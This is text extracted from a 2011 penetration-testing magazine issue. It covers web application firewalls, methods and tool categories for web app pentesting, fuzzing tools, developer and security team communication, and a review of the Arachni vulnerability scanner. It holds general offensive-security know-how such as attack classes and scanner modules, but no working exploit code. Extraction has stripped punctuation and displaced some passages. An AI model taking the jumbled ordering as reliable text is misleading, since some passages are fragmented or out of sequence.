The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
